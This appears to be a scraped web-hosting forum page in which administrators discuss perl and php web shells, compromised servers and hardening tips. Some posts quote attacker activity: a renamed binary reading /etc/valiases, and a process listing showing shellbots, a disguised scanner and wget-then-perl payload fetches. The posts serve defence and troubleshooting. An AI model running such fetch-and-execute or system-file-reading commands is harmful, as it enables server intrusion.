Executing ./ Commands Through Hackers Shells
Jul 12, 2008
I've been concerned about executing commands through (./) using php and perl shells on the server
a new way of hacking these days is using perl shells , even if the perl was terminated on the server ,, or was forbidden for users
hackers upload a (perl) program to the server to use it instead of the server's own perl
any way ,,
chmoding the (ls-cat-more-less) to 4750 seems to give permission denied when exeuting these programs on the server
but the hackers also found that they could upload their own ls-cat-more-less programs and use them instead of the server's
they also could rename them ls==>ki or anything and use them like this
./ki /etc/valiases -alXrt
and the commands work like charm for them
./ <<--- this command uses the sh program on the server ,, ((sh which refers to bash on most servers))
so
./ki
is the same as
sh ki
and
bash ki
so i tried chmoding sh with 4750 and that killed the exploit
i was concerned about cpanel's and the website's functionality
so i tried changing an accounts password and creating a database ,, they both worked fine
so ,, if u thing chmoding 4750 sh is a bad idea please let me know
and if you know any other ways of disabling all the perl scripts on the server
View 14 Replies
ADVERTISEMENT
Apr 26, 2009
im trying to write a script interfacing to WHM again via remote access key. What I want to achieve is to remove an ip from iptables. using PHP script (CURL), any thoughts on how i can remove an ip from iptables? I know the ssh command how to do it but i dont know if it will work via a PHP (CURL) script connecting to WHM via remote access key.
View 1 Replies
View Related
Feb 4, 2008
This is following on from:
[url]
So I need to execute a list of commands via a cron job rather than having the script 'wait' for the shell to finish processing (as this was leading to time outs and all sorts of issues).
I'm guessing the way to do this is to have my php set up a cron job to occur at some point in the near future (like current time + 1 min), then to prevent the job from repeating the next hour, it removes itself from the cron list as the final command.
Does this sound like a reasonable way to go about executing a queue of shell commands from the browser that take an indefinite (possibly long) amount of time?
View 4 Replies
View Related
Apr 11, 2008
I am trying to make a free shell service, and i was wondering if it was possible using a FreeBSD VPS, with CPanel, and additional IPs. Or would a dedicated server be required to do that?
View 11 Replies
View Related
Dec 21, 2008
Does anyone have a recommendation for a company from which I can rent limited Windows accounts?
I have some clients who need 50-100 different Windows accounts for a project they're working on; Renting a dedicated server for each one is a bit much, but Terminal Services would be fine.
View 4 Replies
View Related
Nov 4, 2007
for save my server from perl shells , many hakers can haked by cgi-telnet & r57 shell with perl how can save perl without stop it because if i stop it cpanels was disabled any one have any way to save my server from shell perl?
View 11 Replies
View Related
Mar 27, 2007
what programmes should be installed in a dedicated server that will be used for irc hosting (shells etc) and will run FreeBSD OS?
some i have thought:
APF
identd
named
tcl
ftp
apache
View 5 Replies
View Related
Jul 20, 2007
Currently looking for a UK based VPS provider that allows IRC. 256-512mB of RAM, only about 5gB of HDD space required, maybe 10gB. Being at UK Solutions is a big plus, but not a requirement. Will be hosting IRC shell accounts for BNCs, Eggdrops and various IRC clients.
At least 10 IPs would also be a plus. Not certain on budget yet.
View 14 Replies
View Related
Jan 26, 2009
i need a company that offers all of these services.
uk or us not fussed really.
shared -
reseller -
ftp -
ircd -
shells -
eggdrop -
bnc -
shoutcast -
i have bittraffic so far. but dont really wanna use them ...
View 14 Replies
View Related
Mar 6, 2007
Having this problem on chroot'ed sites in Ensim.
This is what I have in my php.conf:
Code:
[root@ns1 conf.d]# cat /etc/httpd/conf.d/php.conf
#
# PHP is an HTML-embedded scripting language which attempts to make it
# easy for developers to write dynamically generated webpages.
#
LoadModule php5_module modules/libphp5.so
SetOutputFilter PHP
SetInputFilter PHP
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps
This prevents file.php.gif from executing in a non-chrooted site, but in my chrooted sites, file.php.gif will execute as a PHP file. Any idea why? Some other config I have to change?
View 10 Replies
View Related
Apr 16, 2009
how I can execute memtest86 remotely without any KVM access. Is this possible? If so, how would I go about it? I run Debian 5.0 32bit with bigmem kernel (16x4GB Dimms)
View 5 Replies
View Related
May 14, 2007
i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.
my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce
View 7 Replies
View Related
Sep 29, 2008
A very simple shell script that rotates log files of lighttpd server everyday becomes zombie after executing via cron. If executed directly in the shell it just dies normally. Tried to add "exit 0;" in the last line but the same effect...
An important notice: the script stops and starts the server, maybe it dies abnormally because it forks a process (lighttpd)?
View 5 Replies
View Related
Jun 16, 2008
I have a new dedicated server and am trying to set up a cron job via CPanel on on of my accounts (we'll call it "abc" account).
In the Cron job area, where it asks for the command to run, I enter this:
/home/abc/public_html/forum/class/sendnotice.php
But when the job runs, it doesn't seem to be executing the .php file. Instead, I get stuff like this via email:
/home/acb/public_html/forum/class/sendnotice.php: line 1: ?php: No such file or directory
/home/abc/public_html/forum/class/sendnotice.php: line 2: ////////////////////////////: is a directory
/home/abc/public_html/forum/class/sendnotice.php: line 3: //: is a directory
/home/abc/public_html/forum/class/sendnotice.php: line 4: //: is a directory
/home/abc/public_html/forum/class/sendnotice.php: line 5: //: is a directory
/home/abc/public_html/forum/class/sendnotice.php: line 6: //: is a directory
/home/abc/public_html/forum/class/sendnotice.php: line 7: //: is a directory
/home/abc/public_html/forum/class/sendnotice.php: line 8: //: is a directory
/home/abc/public_html/forum/class/sendnotice.php: line 9: //: is a directory
So it is as if the cron job is reading each line of the .php file instead of just running it. Am I doing something wrong in setting up the cron job to run that file or could it be a configuration issue with the new server?
View 3 Replies
View Related
May 24, 2008
how I might be able to execute a Linux command by sending a text message to some email address? Where if that email address gets a message (either any message, or perhaps only messages containing some password), a Linux command is executed, e.g.
named -u named
Perhaps via bash script.
View 14 Replies
View Related
Feb 12, 2013
I installed apache 2.4.3 in windows server 2003. Since i did not get administrator rights in this machine i could not install as a service.
I runned as an application through the command line console and is working fine.
Is there any difference regarding performance when running as a service or as an application?
Is there any other benefit or drawback of running as a service or as an application?
View 2 Replies
View Related
Apr 18, 2015
A customer want to execute a cronjob in plesk every minute, but the cronjob was only executed every 5 minutes...
(so that the cronjob was executed every minute...)
View 2 Replies
View Related
Jan 21, 2007
Hackers these days don't hack for money, alot of times they hack for pride and the lame fun in it.
Look at this website,
[url]
View 14 Replies
View Related
Dec 27, 2007
I am constantly battling hackers over the last week and I have to admit I'm not really sure what it is that is letting them in, but they're getting in... the processes all run as "apache" so clearly it's the webserver somehow.
I've changed the ssh port, have disabled cron on the apache user and have set php safe_mode on the site I think might be to blame, but still no luck.
Logged in this morning to be greeted by this...
Quote:
[root@s15247463 httpdocs]# ps -fe | grep apache
apache 2889 2220 1 Dec26 ? 00:18:36 /usr/sbin/httpd
apache 2891 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd
apache 2892 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 2893 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 2894 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd
apache 2895 2220 0 Dec26 ? 00:00:05 /usr/sbin/httpd
apache 2896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 14664 2220 0 Dec26 ? 00:00:03 /usr/sbin/httpd
apache 32714 1 0 Dec26 ? 00:00:02 /apache/bin/httpd
apache 32719 1 0 Dec26 ? 00:00:02 /apache/bin/httpd
apache 19751 2894 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 19764 1 23 Dec26 ? 03:31:35 shellbot
apache 28642 2220 0 Dec26 ? 00:00:04 /usr/sbin/httpd
apache 28662 2891 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 28666 1 22 Dec26 ? 03:23:10 shellbot
apache 29532 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 29933 2220 0 Dec26 ? 00:07:18 /usr/sbin/httpd
apache 20833 2893 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20838 1 13 Dec26 ? 01:21:35 [httpds]
apache 20847 29532 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20853 1 13 Dec26 ? 01:21:33 [httpds]
apache 20870 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 20879 2892 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20884 1 13 Dec26 ? 01:21:28 [httpds]
apache 20887 2896 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20892 1 13 Dec26 ? 01:21:16 [httpds]
apache 20895 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 20896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 20901 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 21445 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 1875 1 0 00:01 ? 00:00:00 [httpds]
apache 2237 1 0 00:14 ? 00:00:00 ./mocks start
apache 5465 20895 0 00:23 ? 00:00:00 [sh] <defunct>
apache 5477 1 6 00:23 ? 00:24:48 shellbot
apache 10110 14664 0 01:00 ? 00:00:00 [sh] <defunct>
apache 10142 1 11 01:00 ? 00:44:09 shellbot
apache 10537 2220 0 01:27 ? 00:00:01 /usr/sbin/httpd
apache 13780 1 0 02:28 ? 00:00:00 [httpds]
apache 13781 13780 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13784 1 0 02:28 ? 00:00:00 [httpds]
apache 13785 13784 0 02:28 ? 00:00:00 sh -c wget[url]
-O [url]
apache 13788 1 0 02:28 ? 00:00:00 [httpds]
apache 13789 13788 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13792 1 0 02:28 ? 00:00:00 [httpds]
apache 13793 13792 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13798 13789 0 02:29 ? 00:00:00 perl test.txt
apache 13802 13781 0 02:29 ? 00:00:00 perl test.txt
apache 13806 13793 0 02:29 ? 00:00:00 perl test.txt
apache 13810 13785 0 02:29 ? 00:00:00 perl test.txt
apache 22282 2220 0 03:40 ? 00:00:00 /usr/sbin/httpd
apache 22434 20896 0 03:51 ? 00:00:00 [sh] <defunct>
apache 22442 1 10 03:51 ? 00:20:33 [httpd]
apache 22513 21445 0 03:55 ? 00:00:00 [perl] <defunct>
apache 22515 1 0 03:55 ? 00:00:00 /usr/local/apache/bin/nscan -DSSL
apache 22552 2220 0 03:58 ? 00:00:00 /usr/sbin/httpd
apache 23183 1 0 04:03 ? 00:00:48 /usr/local/apache/bin/nscan -DSSL
apache 23187 1 0 04:03 ? 00:00:47 /usr/local/apache/bin/nscan -DSSL
apache 3606 2220 0 04:52 ? 00:00:00 /usr/sbin/httpd
apache 27716 1 0 06:54 ? 00:00:00 [httpd]
apache 27720 1 0 06:54 ? 00:00:00 ./php
apache 28140 1 0 07:06 ? 00:00:00 /bin/sh ./mass 139
apache 28299 28140 0 07:12 ? 00:00:00 /bin/bash ./a 139.1
apache 28302 28299 9 07:12 ? 00:00:20 /bin/bash 139.1 22
View 14 Replies
View Related
Mar 12, 2007
We are rookies and we are being attacked by hackers for the second time in as many weeks. I can see them in shell right now on multiple servers. I can not remember in all the excitement how to take away their root access. How do I stop them from doing any more damage?
View 6 Replies
View Related
May 18, 2007
this is the site whose banners appeared on my kids site after hacking,
View 0 Replies
View Related
May 1, 2009
Twice in about a week mabey 2 weeks my server provider has sent me spoof abuse messages on accounts on my server. These phising pages first linked to a bank then paypal, these phising pages that were placed were on 2 diffrent accounts and the accounts belong to people ive known for a very long time and they wouldnt have any idea how to do this so i know its a hacker getting in somhow.
How can I stop this from happening? Any programs that I can run on the server?
Heck even which log files do I check to see where these attacks are coming from would help as I could block the IP's .
I'm running cpanel as well if that helps, i use CSF .
I dont want to have to move servers as that would take a very long time for me.
View 14 Replies
View Related
May 7, 2009
My PR4 site has been hacked by chinese hackers.
They fortunately did not do anything exceptionally terrible, but the site was down, they altered the serps results and now my inbox ( operating from Squirelmail ) is now receiving even more spam than before.
A network expert suggested that my server would now be being used for sending spam.
And my company, who will remain nameless atm seem to claim that no server is safe from hackers under any circumstances.
I would like to copy to you the companies response to my questions and I would hope for a word or two of inspiration and encouragement from you?
The second string in each question is the server companies response.
1.Please quote me for checking to see if the server is being used for spam and blocking this from happening.
We could certainly check and see if you server is currently sending out any spam and try to identify where it is originating from. Depending on the issue a fix may be required by your developers
2.Running a check on the sites code to see if there has been any amendments to the coding on the site
We can check and see if there has been any FTP access and look at file modification dates, this would hopefully pick up and issues.
3.Making sure the server is safe and that all China ip ranges are banned.
Whilst we cannot ban all Chinese ranges as we do not know all ranges China uses we can lock FTP and SSH access to certain ranges only, you would need to provide these ranges.
4.Applying a second level of security to stop a spammer from hacking the system ( However I am sure I already have anti virus and spy ware on the server )
I’m not sure you do have any anti-virus/spyware on your server, it is certainly not something we install. I don’t really believe either of those tools would stop someone hacking the server either, Linux server don’t really get affected by that. We could run a rootkit checker which checks for backdoors and modification of the operating system files. We would also suggest making sure the scripts are secure and any web interface (admin area) logins have secure passwords and are also IP restricted.
For the work above we would charge 1 hour support at £150 per hour ex vat.
View 10 Replies
View Related
Feb 21, 2007
I am giving few tips on securing your server against hack attempts. You must check these inspite of other securities like firewall, rootkits detectors etc.
1. Most Important, do not disable safe_mode under php.ini. If any customer asks to disable it, turn it off on his account only, not on whole server.
As most of the time attack is done using shellc99 (phpshell) script. In case safe_mode is off on server and there are public dirs with 777 permission, he can easily hack through.
2. Compile apache with safe mode as well.
3. In cpanel under tweek settings, turn on base_dir, if someone requests to turn off, turn it off on his/her account only. As using phpshell one can easily move to main server dirs like /etc, /home.
4. Do not allow Anonymous Ftp on your server. You can turn it off from ftp config under WHM Service Configuration. If its allowed, one can easily bind port using nc tool with your server and gain root access. Always keep it disabled.
5. Make sure /tmp is secured. You can easily do that by running this command /scripts/securetmp using ssh. But do make sure, /tmp is secured. Else one can upload some kind of perl script in /tmp dir and can deface or damage all data on the few/all accounts on your server.
keeping your server secure from hack attempts.
View 7 Replies
View Related
May 23, 2007
What would you think about creating a big text file with IPs of known hackers, bots and similar "bad" creatures to keep out from our servers? Do you think it's worth it?
You can post lists of IPs if you want...
View 7 Replies
View Related
Sep 27, 2007
I've been on yet-another crusade this morning..and have a few questions for the..umm.."general" hosting audience.
We live in odd times. If you told me that script kiddies might be able to completely comprimise a server via php..or that spammers are now using the webserver *itself* to send spam a few years ago..I would have laughed. This is no laughing matter.
A concept of privacy comes into play..and I'm curious how many of you handle it. Joe pays me for a account..agrees to my TOS/AUP..and starts uploading files. The way I see it..we have many ways of dealing with scripts that do bad things. It seems to me, though...this may be considered "spying" on our customers.
If we have a script..say..that runs every fifteen minutes..and looks for these scripts..wouldn't that be considered spying?
Or would this be something we should just bury in our aup/tos that this might happen? I have read and agreed to quite a few of those AUP/TOS things..and I can't remember even one time even a mention that files that I upload to the server may be scanned or inspected..before allowing the file to be placved on the server.
Never..not once.
However...this may have changed. If you've ever tried to get even a simple Perl script to work on a Cpanel server...you probably understand that many safeguards are there for the sake of everybody else on the server...and may prevent you from doing what you want to do with the script(s).
At the same time..though..it seems to fly in the face of common sense that many script packages available today are inherently insecure. Chmod 777 files and directories? Even in the times we live in today and know this is a very, very bad idea?
Yet..there seem to be even more like this today than ever before.
>>I mention this from first hand expereince. One of the many magazines I get had a article detailing the trials the author was having trying to get Simple Groupware working on a vps.
yesterday..I noticed a post with a person wanting something installed on a production server. Not only was the program a beta..but..just like Simple Groupware..looked horribly insecure.
In retrospect...I can remember the very first php script I ever used. The year was 1996..and this was my first Cpanel shared account. I even remember having to add *.php to the mime types.
It installed without a hitch..and..coming from the Perl world I had spent many years in..and many hours getting those scripts to work..it seemed almost like a miracle.
It seems, as hosts, there are a few ways we can go at this.
1) Modify the ftp server so it inspects files
2) Have a program that looks for things..much like rkhunter does.
3) A front-end for all scripts..perhaps MySQL as well..that enforces rulesets..for restricted content..or resource allocations.
View 1 Replies
View Related
Jan 16, 2007
One of my servers which hosts 200 domains is being attacked by hacker(s). It seems any world writeable files are being replaced or modified by the linux account nobody. How can I secure this account? Is it safe to change the password? I know many processes depend on using the nobody account to run.
View 1 Replies
View Related
Jun 25, 2007
guys im tired off fighting those hackers everyday! i have about 20 websites,and everyday i have one of them hacked! i restore a backup then another one hacked!
thats unbelivable!!!
those bastards upload there shell scripts to websites via bugs or whatever from php files!!
is there anyway to stop these commands?
can .htaccess helps? how?
i talked to my webhosting companies for my websites! ....
View 10 Replies
View Related
Nov 7, 2009
two of my website on the server was changed by the hackers.How did they do it?
View 7 Replies
View Related
Mar 27, 2009
For you, what a webmaster must do to prevent get hacked?
View 14 Replies
View Related
